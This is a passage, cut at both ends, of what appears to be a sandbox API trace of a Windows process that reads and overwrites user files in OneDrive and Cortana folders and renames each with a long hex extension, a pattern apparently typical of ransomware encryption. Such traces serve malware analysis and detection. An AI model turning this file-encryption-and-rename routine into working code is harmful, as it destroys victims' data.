lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0114.072] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x2c7ff70) returned 0x0 [0114.073] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\VideoStreamingPlugin.dll", lpString2=".FC24ADEB180ABBDD43ECBA53C96A4293D2DD87C038AB2BFCD47E2B7FE0794277" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\VideoStreamingPlugin.dll.FC24ADEB180ABBDD43ECBA53C96A4293D2DD87C038AB2BFCD47E2B7FE0794277") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\VideoStreamingPlugin.dll.FC24ADEB180ABBDD43ECBA53C96A4293D2DD87C038AB2BFCD47E2B7FE0794277" [0114.073] GetProcessHeap () returned 0x600000 [0114.073] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x17e) returned 0x318abb0 [0114.073] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x2c7ff60, FileInformation=0x318abb0, Length=0x17e, FileInformationClass=0xa) returned 0x0 [0114.074] CloseHandle (hObject=0x334) returned 1 [0114.075] GetProcessHeap () returned 0x600000 [0114.075] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0114.077] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0114.163] ReadFile (in: hFile=0x334, lpBuffer=0x680470, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x660338 | out: lpBuffer=0x680470*, lpNumberOfBytesRead=0x0, lpOverlapped=0x660338) returned 1 [0114.163] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0114.163] NtQueryObject (in: Handle=0x310, ObjectInformationClass=0x1, ObjectInformation=0x30c8250, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x30c8250, ReturnLength=0x2c7ff70) returned 0x0 [0114.164] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-18_130550_ac-d08.log", lpString2=".175623E53E6C67441A5BFCA68792A8DE3B18CA87C8F36D88BB582CF11E4B1F11" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-18_130550_ac-d08.log.175623E53E6C67441A5BFCA68792A8DE3B18CA87C8F36D88BB582CF11E4B1F11") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-18_130550_ac-d08.log.175623E53E6C67441A5BFCA68792A8DE3B18CA87C8F36D88BB582CF11E4B1F11" [0114.164] GetProcessHeap () returned 0x600000 [0114.164] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x17a) returned 0x6d6ee8 [0114.164] NtSetInformationFile (FileHandle=0x310, IoStatusBlock=0x2c7ff60, FileInformation=0x6d6ee8, Length=0x17a, FileInformationClass=0xa) returned 0x0 [0114.165] CloseHandle (hObject=0x310) returned 1 [0114.165] GetProcessHeap () returned 0x600000 [0114.165] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0114.168] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0114.170] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x6603e8, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x6603e8, ReturnLength=0x2c7ff70) returned 0x0 [0114.170] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install-PerUser_2021-02-11_125336_9c0-9f8.log", lpString2=".64CDF4A91C80DA662332FF0CD6CFA24D753B320C0664511471A5FE6158ABBB66" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install-PerUser_2021-02-11_125336_9c0-9f8.log.64CDF4A91C80DA662332FF0CD6CFA24D753B320C0664511471A5FE6158ABBB66") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install-PerUser_2021-02-11_125336_9c0-9f8.log.64CDF4A91C80DA662332FF0CD6CFA24D753B320C0664511471A5FE6158ABBB66" [0114.170] GetProcessHeap () returned 0x600000 [0114.170] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x19c) returned 0x6b0e58 [0114.170] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x2c7ff60, FileInformation=0x6b0e58, Length=0x19c, FileInformationClass=0xa) returned 0x0 [0114.173] CloseHandle (hObject=0x334) returned 1 [0114.173] GetProcessHeap () returned 0x600000 [0114.173] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x660338 | out: hHeap=0x600000) returned 1 [0114.174] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0118.955] ReadFile (in: hFile=0x334, lpBuffer=0x32e82d8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x32c81a0 | out: lpBuffer=0x32e82d8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x32c81a0) returned 1 [0118.955] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0118.956] WriteFile (in: hFile=0x334, lpBuffer=0x32e82d8, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32c81a0 | out: lpBuffer=0x32e82d8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32c81a0) returned 0x0 [0118.956] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0118.957] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x32c8250, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x32c8250, ReturnLength=0x2c7ff70) returned 0x0 [0118.957] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_11[1].txt", lpString2=".3D1130098791C7D95F18B6C03C8B12267E9176721584AC6DBFD20CE229E60B53" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_11[1].txt.3D1130098791C7D95F18B6C03C8B12267E9176721584AC6DBFD20CE229E60B53") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_11[1].txt.3D1130098791C7D95F18B6C03C8B12267E9176721584AC6DBFD20CE229E60B53" [0118.957] GetProcessHeap () returned 0x600000 [0118.957] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x240) returned 0x625368 [0118.957] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x2c7ff60, FileInformation=0x625368, Length=0x240, FileInformationClass=0xa) returned 0x0 [0118.958] CloseHandle (hObject=0x334) returned 1 [0118.958] GetProcessHeap () returned 0x600000 [0118.958] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x32c81a0 | out: hHeap=0x600000) returned 1 [0118.960] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0118.961] ReadFile (in: hFile=0x33c, lpBuffer=0x3310430, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x32f02f8 | out: lpBuffer=0x3310430*, lpNumberOfBytesRead=0x0, lpOverlapped=0x32f02f8) returned 1 [0118.962] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0118.962] WriteFile (in: hFile=0x33c, lpBuffer=0x3310430*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32f02f8 | out: lpBuffer=0x3310430*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32f02f8) returned 1 [0118.963] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0118.963] NtQueryObject (in: Handle=0x33c, ObjectInformationClass=0x1, ObjectInformation=0x32f03a8, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x32f03a8, ReturnLength=0x2c7ff70) returned 0x0 [0118.964] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_12[1].txt", lpString2=".34E3723C88A46A7598EDB9A3DA3563F2498F7372B71A234D6FAAD33778789B6E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_12[1].txt.34E3723C88A46A7598EDB9A3DA3563F2498F7372B71A234D6FAAD33778789B6E") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_12[1].txt.34E3723C88A46A7598EDB9A3DA3563F2498F7372B71A234D6FAAD33778789B6E" [0118.964] GetProcessHeap () returned 0x600000 [0118.964] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x240) returned 0x6255b0 [0118.964] NtSetInformationFile (FileHandle=0x33c, IoStatusBlock=0x2c7ff60, FileInformation=0x6255b0, Length=0x240, FileInformationClass=0xa) returned 0x0 [0118.965] CloseHandle (hObject=0x33c) returned 1 [0118.965] GetProcessHeap () returned 0x600000 [0118.965] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x32f02f8 | out: hHeap=0x600000) returned 1 [0118.967] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0118.971] ReadFile (in: hFile=0x334, lpBuffer=0x6a0480, nNumberOfBytesToRead=0x3800, lpNumberOfBytesRead=0x0, lpOverlapped=0x680348 | out: lpBuffer=0x6a0480*, lpNumberOfBytesRead=0x0, lpOverlapped=0x680348) returned 1 [0118.971] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0118.971] WriteFile (in: hFile=0x334, lpBuffer=0x6a0480*, nNumberOfBytesToWrite=0x3800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x680348 | out: lpBuffer=0x6a0480*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x680348) returned 1 [0118.975] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0118.975] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x6803f8, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x6803f8, ReturnLength=0x2c7ff70) returned 0x0 [0118.976] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_13[1].txt", lpString2=".DB7A931A7DC7CF3A8DC854C1F0CD065D53D3E9FC0FDFB00DA0ACC4EB656D2605" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_13[1].txt.DB7A931A7DC7CF3A8DC854C1F0CD065D53D3E9FC0FDFB00DA0ACC4EB656D2605") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_13[1].txt.DB7A931A7DC7CF3A8DC854C1F0CD065D53D3E9FC0FDFB00DA0ACC4EB656D2605" [0118.976] GetProcessHeap () returned 0x600000 [0118.976] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x240) returned 0x6d77d0 [0118.976] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x2c7ff60, FileInformation=0x6d77d0, Length=0x240, FileInformationClass=0xa) returned 0x0 [0118.977] CloseHandle (hObject=0x334) returned 1 [0118.977] GetProcessHeap () returned 0x600000 [0118.977] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x680348 | out: hHeap=0x600000) returned 1 [0118.978] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0118.982] ReadFile (in: hFile=0x334, lpBuffer=0x6a0480, nNumberOfBytesToRead=0x6a00, lpNumberOfBytesRead=0x0, lpOverlapped=0x680348 | out: lpBuffer=0x6a0480*, lpNumberOfBytesRead=0x0, lpOverlapped=0x680348) returned 1 [0118.983] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0118.983] WriteFile (in: hFile=0x334, lpBuffer=0x6a0480*, nNumberOfBytesToWrite=0x6a00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x680348 | out: lpBuffer=0x6a0480*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x680348) returned 1 [0118.984] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0118.984] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x6803f8, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x6803f8, ReturnLength=0x2c7ff70) returned 0x0 [0118.985] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_14[1].txt", lpString2=".87707855B55B25CCD504135FE4F1F0064AC0201C1BB781B139981D1AE6DDD23A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_14[1].txt.87707855B55B25CCD504135FE4F1F0064AC0201C1BB781B139981D1AE6DDD23A") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_14[1].txt.87707855B55B25CCD504135FE4F1F0064AC0201C1BB781B139981D1AE6DDD23A" [0118.985] GetProcessHeap () returned 0x600000 [0118.985] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x240) returned 0x6d7a18 [0118.985] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x2c7ff60, FileInformation=0x6d7a18, Length=0x240, FileInformationClass=0xa) returned 0x0 [0118.986] CloseHandle (hObject=0x334) returned 1 [0118.986] GetProcessHeap () returned 0x600000 [0118.986] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x680348 | out: hHeap=0x600000) returned 1 [0118.986] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0118.988] ReadFile (in: hFile=0x33c, lpBuffer=0x6a0480, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x680348 | out: lpBuffer=0x6a0480*, lpNumberOfBytesRead=0x0, lpOverlapped=0x680348) returned 1 [0118.988] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0118.989] WriteFile (in: hFile=0x33c, lpBuffer=0x6a0480*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x680348 | out: lpBuffer=0x6a0480*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x680348) returned 1 [0118.990] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0118.991] NtQueryObject (in: Handle=0x33c, ObjectInformationClass=0x1, ObjectInformation=0x6803f8, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x6803f8, ReturnLength=0x2c7ff70) returned 0x0 [0118.992] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_15[1].txt", lpString2=".41086129ADACA582BBEBAF47225E898CBE3FFC3D0264E91B1F2D876559DE7D25" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_15[1].txt.41086129ADACA582BBEBAF47225E898CBE3FFC3D0264E91B1F2D876559DE7D25") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_15[1].txt.41086129ADACA582BBEBAF47225E898CBE3FFC3D0264E91B1F2D876559DE7D25" [0118.992] GetProcessHeap () returned 0x600000 [0118.992] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x240) returned 0x6d7c60 [0118.992] NtSetInformationFile (FileHandle=0x33c, IoStatusBlock=0x2c7ff60, FileInformation=0x6d7c60, Length=0x240, FileInformationClass=0xa) returned 0x0 [0118.993] CloseHandle (hObject=0x33c) returned 1 [0118.993] GetProcessHeap () returned 0x600000 [0118.993] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x680348 | out: hHeap=0x600000) returned 1 [0118.993] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0118.996] ReadFile (in: hFile=0x33c, lpBuffer=0x6a0480, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x680348 | out: lpBuffer=0x6a0480*, lpNumberOfBytesRead=0x0, lpOverlapped=0x680348) returned 1 [0118.996] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0118.996] WriteFile (in: hFile=0x33c, lpBuffer=0x6a0480*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x680348 | out: lpBuffer=0x6a0480*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x680348) returned 1 [0118.997] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0118.997] NtQueryObject (in: Handle=0x33c, ObjectInformationClass=0x1, ObjectInformation=0x6803f8, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x6803f8, ReturnLength=0x2c7ff70) returned 0x0 [0118.998] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_16[1].txt", lpString2=".134783E294EF33447486D98BEBB8CE8EA4CE39E71844FC22DD52FAE7D72C6663" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_16[1].txt.134783E294EF33447486D98BEBB8CE8EA4CE39E71844FC22DD52FAE7D72C6663") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_16[1].txt.134783E294EF33447486D98BEBB8CE8EA4CE39E71844FC22DD52FAE7D72C6663" [0118.998] GetProcessHeap () returned 0x600000 [0118.998] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x240) returned 0x6d7ea8 [0118.998] NtSetInformationFile (FileHandle=0x33c, IoStatusBlock=0x2c7ff60, FileInformation=0x6d7ea8, Length=0x240, FileInformationClass=0xa) returned 0x0 [0118.999] CloseHandle (hObject=0x33c) returned 1 [0118.999] GetProcessHeap () returned 0x600000 [0118.999] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x680348 | out: hHeap=0x600000) returned 1 [0119.000] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0119.005] ReadFile (in: hFile=0x33c, lpBuffer=0x6a0480, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x680348 | out: lpBuffer=0x6a0480*, lpNumberOfBytesRead=0x0, lpOverlapped=0x680348) returned 1 [0119.005] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0119.005] WriteFile (in: hFile=0x33c, lpBuffer=0x6a0480*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x680348 | out: lpBuffer=0x6a0480*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x680348) returned 1 [0119.006] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, 